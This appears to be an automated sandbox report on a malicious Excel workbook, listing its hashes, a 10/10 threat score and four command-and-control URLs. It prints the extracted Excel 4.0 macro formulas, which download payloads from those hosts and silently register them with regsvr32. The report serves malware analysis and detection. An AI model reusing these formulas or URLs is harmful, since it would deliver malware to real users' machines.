Overview

overview

10

Static

static

10

34d22071c3...53.xls

windows7-x64

10

34d22071c3...53.xls

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    34d22071c39d6bd314e403e8eba0c753.xlsx

  • Size

    89KB

  • MD5

    34d22071c39d6bd314e403e8eba0c753

  • SHA1

    8a9f2ebc44e1dd885e36541d9064f43e98b9fcac

  • SHA256

    6d5a6f627ed27921596c22ca0344dd70495549c8b3df17e2067f865980f78238

  • SHA512

    621a3b7b31b929f85075c14ad3277c86bd05437a374ab20fbc618c4b3b9f967163b35f0a52ea21a1b76a8163a7d7a4a30436c18ab00496c03769d291552d8315

  • SSDEEP

    1536:d6k3hOdsylKlgxopeiBNhZFGzE+cL2kdAdHuS4lcTO9Tv7UYdEJi9az:8k3hOdsylKlgxopeiBNhZFGzE+cL2kdy

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://bruidsfotografie-breda.nl/cache/QPk/

http://www.chawkyfrenn.com/icon/JtT/

https://chiptochip.es/alojamiento-web/dofwXVVQ3hvsp/

http://chillpassion.com/wp-content/nd4wjKgokzKbKH0DQDD/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bruidsfotografie-breda.nl/cache/QPk/","..\phdg1.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg1.ocx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.chawkyfrenn.com/icon/JtT/","..\phdg2.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg2.ocx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://chiptochip.es/alojamiento-web/dofwXVVQ3hvsp/","..\phdg3.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg3.ocx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://chillpassion.com/wp-content/nd4wjKgokzKbKH0DQDD/","..\phdg4.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg4.ocx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • 34d22071c39d6bd314e403e8eba0c753.xlsx
    .xls .xlsx windows office2003